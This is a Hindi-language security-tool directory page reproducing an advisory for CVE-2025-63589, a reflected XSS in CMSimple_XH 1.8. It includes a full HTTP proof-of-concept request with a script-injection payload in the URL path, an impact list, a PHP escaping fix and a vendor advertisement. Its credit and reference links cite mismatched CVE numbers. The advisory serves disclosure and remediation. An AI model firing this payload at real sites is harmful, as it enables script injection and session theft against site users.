Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-63589 — CMSimple_XH 1.8 के लिए प्रतिबिंबित XSS प्रमाण-की-अवधारणा जिसमें असंसाधित पथ खंडों के माध्यम से अप्रमाणित स्क्रिप्ट इंजेक्शन है, जिसमें CVSS 6.1 स्कोरिंग और PHP उपचार उदाहरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/cybercrewinc/cve-2025-63589
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

CMSimple_XH 1.8 के लिए प्रतिबिंबित XSS प्रमाण-की-अवधारणा जिसमें असंसाधित पथ खंडों के माध्यम से अप्रमाणित स्क्रिप्ट इंजेक्शन है, जिसमें CVSS 6.1 स्कोरिंग और PHP उपचार उदाहरण शामिल है।

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-63589 CMSimple_XH index.php पथ हैंडलिंग में रिफ्लेक्टेड XSS

खोज की तिथि: 6 अक्टूबर, 2025
उत्पाद: CMSimple_XH (ओपन-सोर्स फ्लैट-फ़ाइल CMS)
प्रभावित संस्करण: 1.8 CVE(s): CVE-2025-63589 प्रमाणीकरण आवश्यक: नहीं (बिना प्रमाणीकरण)
हमले का प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
अनुमानित CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (मध्यम)

index.php में फ्रंट-कंट्रोलर डायनामिक पाथ सेगमेंट्स (टेम्पलेट/पेजों पर रूट करने के लिए उपयोग किए जाने वाले) स्वीकार करता है और उन मानों को टेम्पलेट रेंडरिंग में पास करता है। कोड इन पाथ सेगमेंट्स को एट्रिब्यूट्स और एंकर hrefs में डालने से पहले ठीक से सैनिटाइज़ या HTML-एनकोड नहीं करता है। परिणामस्वरूप, "> जैसे वर्णों और इंजेक्ट किए गए टैग्स (जैसे <script>...</script>) वाला एक विशेष रूप से तैयार किया गया request URI HTML आउटपुट में शब्दशः प्रतिबिंबित होता है और ब्राउज़र द्वारा निष्पादित किया जाता है।

विशिष्ट प्रतिबिंब बिंदुओं में शामिल हैं:

  • फ़ॉर्म action एट्रिब्यूट्स (जैसे, लॉगिन/खोज फ़ॉर्म)
  • नेविगेशन/मेनू आइटम href एट्रिब्यूट्स
  • ब्रेडक्रंब्स / लोकेटर नेविगेशन (<nav class="locator">)
  • फ़ुटर लिंक्स (Print view, Sitemap, Login, आदि)

चूँकि इनपुट HTML एट्रिब्यूट संदर्भों और एंकर सामग्री के अंदर पहुँच जाता है, मानक एट्रिब्यूट-एन्कोडिंग आवश्यक है लेकिन अनुपस्थित है।

प्रूफ-ऑफ-कॉन्सेप्ट (PoC)

अनुरोध:

root@kitploit:~
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
Pasted image 20251006203832

प्रतिक्रिया:

Pasted image 20251006203959
Pasted image 20251006204254

इंजेक्ट किया गया पेलोड gjtqw"><script>alert(1)</script>co2cu बिना एन्कोडिंग के मेनू लिंक्स, ब्रेडक्रंब्स, खोज फ़ॉर्म action और फ़ुटर लिंक्स में प्रतिबिंबित होता है, जिसके परिणामस्वरूप पेज रेंडर होने पर स्क्रिप्ट निष्पादित होती है।

एक action एट्रिब्यूट को सुरक्षित रूप से आउटपुट करने के लिए सुझाया गया PHP उदाहरण:

root@kitploit:~
$safe_segment = rawurlencode($segment);              // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

प्रभाव

  • क्लाइंट-साइड कोड निष्पादन (पीड़ितों के ब्राउज़रों में मनमाना JS चलाना)
  • सूचना का खुलासा (DOM पढ़ना, क्लाइंट-सुलभ कुकीज़/टोकन बाहर निकालना)
  • सेशन हाइजैकिंग / प्रतिरूपण यदि सेशन टोकन JS के लिए सुलभ हों (न कि HttpOnly)
  • UI स्पूफिंग / फ़िशिंग (नकली लॉगिन प्रॉम्प्ट या नकली पेज रेंडर करना)
  • जबरन कार्रवाइयाँ पीड़ित के प्रमाणित सेशन का उपयोग करके निष्पादित

क्रेडिट

निर्धारित CVE: CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

खोजकर्ता: CyberCrew कंपनी / साइबरक्रू

संदर्भ

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ संपर्क

यदि आपके कोई प्रश्न या परामर्श हों, तो कृपया बेझिझक संपर्क करें।


🏢 CyberCrew कंपनी

G1@4x

📞 Tel: 03-6853-5823
📧 मेल: [email protected]


📄 कंपनी विवरण

आइटमविवरण
कंपनी का नामCyberCrew कंपनी
पताटोक्यो, चियोडा-कु, सोतोकांडा 1-18-13, अकिहाबारा डाई बिल्डिंग, 6ठी मंजिल

🔐 मुख्य सेवाएँ

🛡️ सुरक्षा ऑडिट और जोखिम मूल्यांकन

संगठन की कमजोरियों का बहुआयामी विश्लेषण करके सर्वोत्तम सुधार उपाय सुझाता है।

💻 पेनेट्रेशन टेस्टिंग

लक्षित, परिदृश्य-आधारित और LLM पेंटेस्ट तक की सुविधा।

🌒 डार्क वेब मॉनिटरिंग

गोपनीय जानकारी के लीक का शीघ्र पता लगाकर त्वरित प्रतिक्रिया देता है।

🎯 RED टीम अभ्यास और सोशल इंजीनियरिंग

व्यावहारिक हमले के परिदृश्यों पर आधारित रक्षा क्षमता का मूल्यांकन करता है।

🧠 सुरक्षित सिस्टम डिज़ाइन और परामर्श

विकास के प्रारंभिक चरण से ही सुरक्षा को ध्यान में रखकर डिज़ाइन में सहायता करता है।


🌐 आधिकारिक वेबसाइट: https://www.cybercrew.co.jp
🕒 CyberCrew — आपका विश्वसनीय सुरक्षा भागीदार।

टूल डाउनलोड करें